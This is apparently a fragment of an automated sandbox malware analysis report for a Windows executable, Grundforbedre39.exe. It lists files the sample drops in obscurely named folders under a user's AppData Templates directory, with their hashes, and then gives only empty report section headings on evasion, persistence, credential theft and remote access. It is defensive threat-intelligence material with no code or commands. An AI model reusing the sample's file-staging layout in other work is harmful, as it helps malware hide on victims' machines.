C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Skematisering\Fjeldklftens38.bio	data	910B94BB45EC253A90F4CA8FA56BC584	ED29E140FE94207B697953B8D1466F7C02F4E60E	BE72DFD9F250BBD69DCFD4508D08A327CBB9B3FBB11964FD5F66BEE35A9FD5C9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Skematisering\Jannicks.Lev	data	4386E4D05A2CE413246DF9930185A660	C1D82A8FF3E009BDF3821CCA19C5EEFB104C3BBA	0F908E84C753998701648FBB8C3165E8B121C9153033570D481A314786A34D0B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Skematisering\Yppigere.Kon	GTA audio index data (SDT)	E3BE96075AE2412EA89A85B681A0EE0A	ACA8F411FB66B98F3886C76586BBFAC984AB2712	6D4AA4D0AF94B1C59A822E4CE044434E24B79874F5D915DAED68EF3A0D815A26
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilbragte\sydhavn\kannevasen.txt	ASCII text, with CRLF line terminators	9F716DE9908957BD324DCC4ADA5A33F7	5AA93CFD2DF40B9ED1F46A728EEE203258DC05DD	CDBC11AE1032690D95484A15A78C94AECFEE10103E26372894547D7B25C01A94
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\Gaudiest.pre	data	9CB88B1AE7827818B29E20B15C82A937	A60DFA07CBF65C96A3C7019D99452F138A12746E	445AA65354C5F1118FE748FE21ACFA11A69400398DD1CEAE2362242B187CF754
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\Undervisningsform.bek	data	93A04CCDF51474B877C9414AE5AD2760	1321C10A4CC69A33235C87ABF2779A57619533BB	D9DCAF7157CB66EFE264672D39EA0D004DD2CECDAC777BDB857509AEDDF040FF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\floddeltaets.mar	data	1171715CBB2206BFF607138FEF73877F	D7059E4A741A345239A17FE037C8605D4219E28C	27A8BF54AD65E1DC2C3C88BE4A56792C4960365F12BFF185676D0D4966AE3B31
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\gagers.rec	data	B013C10185F365E645B1A8A4090DE5AF	20F0178AD225AEC8785EA741E82729E6D816CEF0	0A403F11C29743BFFF4A5CBB13DA533121BC9CEC2F2BD38473F3939895422E4C

Windows Analysis Report Grundforbedre39.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Grundforbedre39.exe

Malware Threat Intel
Provided by